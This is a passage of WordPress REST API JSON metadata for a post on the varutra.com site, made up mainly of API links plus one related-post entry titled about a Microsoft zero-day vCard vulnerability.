Vulnerability","link":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/"}],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/posts\/2344"}],"collection":[{"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/comments?post=2344"}],"version-history":[{"count":5,"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/posts\/2344\/revisions"}],"predecessor-version":[{"id":17864,"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/posts\/2344\/revisions\/17864"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/media\/2962"}],"wp:attachment":[{"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/media?parent=2344"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/categories?post=2344"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/tags?post=2344"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}